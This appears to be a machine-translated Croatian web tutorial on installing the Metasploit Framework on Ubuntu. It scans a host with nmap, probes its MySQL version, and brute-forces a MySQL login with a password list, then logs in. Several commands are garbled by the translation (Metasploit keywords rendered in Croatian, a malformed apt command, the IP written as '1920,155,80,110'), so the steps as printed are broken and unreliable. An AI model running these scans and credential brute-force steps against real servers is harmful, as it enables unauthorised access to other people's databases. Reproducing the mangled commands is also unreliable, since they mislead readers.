Metasploit framework za testiranje sigurnosti poslužitelja

Sadržaj
Metasploit okvir, je alat za razvoj i pokretanje exploita protiv računala ili poslužitelja. Metasploit Framework je napisan na jeziku Ruby, više je platformi i zahtijeva moćno računalo za rad, postoji plaćena verzija i besplatna verzija za zajednicu.
Može se preuzeti na www.metasploit.com/framework/download
Idemo instalirati u Linux Ubutnu, ali radi za druge distrose promjenom nekih naredbi.
Pristupamo prozoru terminala i instaliramo ruby, prije nego što je radio s perlom, ali je bio programiran potpuno nov.
Instaliramo ovisnosti o rubinu kako bismo tada mogli pokrenuti okvir.
 sudo apt-get install ruby ​​libruby rdoc sudo apt-get install libyaml-ruby sudo apt-get install libzlib-ruby sudo apt-get install libopenssl-ruby sudo apt-get install libdl-ruby sudo apt-get install libreadline-ruby sudo apt -postavi instalaciju libiconv-ruby sudo apt-get instaliraj rubygems * sudo apt-get instaliraj libgtk2-ruby libglade2-ruby 

Zatim ćemo, ovisno o verziji koju preuzimamo 32 ili 64 bitne sa terminala, dati dopuštenje:
chmod + x metasploit-latest-linux-x64-installer.run

Pokrećemo instalacijski program i otvorit će se instalacijski prozor:
sudo metasploit-latest-linux-x64-installer.run

Kliknut ćemo na sljedeći Fordward), definiramo hoće li se instalirati kao usluga i port koji će zauzeti, prema zadanim postavkama koristi 3790.
Na kraju instalacije iz prozora terminala i s root pristupom ažuriramo okvir
sa naredbom:
msfupdate

Metasploit je program bez grafičkog okruženja koji se u potpunosti izvodi u terminalu. Softveru pristupamo s terminala naredbom:
msfconsole

Interno poznavanje MSF -a
MSF (Metasploit okvir) Strukturiran je u nizu modula kao što su:

Podvizi Koje su skripte i programi dostupni u MSF -u i koje možemo koristiti, organizirani su prema operacijskom sustavu i kategorijama, na primjer exploiti / windows / browser / koji su podvizi dostupni za preglednike koji rade na Windowsima.

Korisni tereti: Radnja će se provesti ako se ranjivost koju testiramo može pronaći i iskoristiti.

Pomoćni: pomoćne skripte s različitim funkcijama, kao što su pomoćne / skener / portcan / tcp i pomoću ovog skenera portova tcp, dobili bismo status porta. Ova je skripta alternativa Nmapu.

Odgovara: Oni kodiraju skriptu kako bi izbjegli neke antiviruse i antispammer.

Pokrećemo testni primjer s terminala koji izvršavamo:
./msfconsole

Odziv Metsploit je msf> odatle ćemo izvršiti sve, a za izlaz ćemo samo upisati exit
Počet ćemo skeniranjem ip -a s nmapom
msf> nmap -sV 190.155.80.110

Aktiviramo pomoćni modul za pristup skriptnim alatima koji će omogućiti rad na mysqlu. Također možemo vidjeti verziju modula.

Skeniramo verziju mysql, iz očiglednih razloga ip je izmišljen i samo za primjer:
 msf> pomoćni (mysql_verzija)> postavi RHOSTS 190.155.80.110 // postavi udaljeni ip msf> postavi RHOSTS 192.155.80.110 msf> pomoćni (mysql_verzija)> pokreni // provjeri verziju mysqla 

Ako se izvrši ispravno, može vratiti verziju mysql:
[*] 190.155.80.110 izvodi Mysql5.0

Još jedan slučaj sa modulom za skeniranje i pokušajem promjene root korisnika mysqla:
 msf> koristiti skener / mysql / mysql_login msf> postaviti USERNAME admin msf> postaviti PASS_FILE /tmp/keys.lst // tekstualna datoteka s mogućim ključevima jedan ispod drugog msf> exploit 

Ako radi, možemo se prijaviti na mysql:
mysql -h 1920,155,80,110 -u admin -pkey

Vi ćete pomoći u razvoju web stranice, dijeljenje stranicu sa svojim prijateljima

wave wave wave wave wave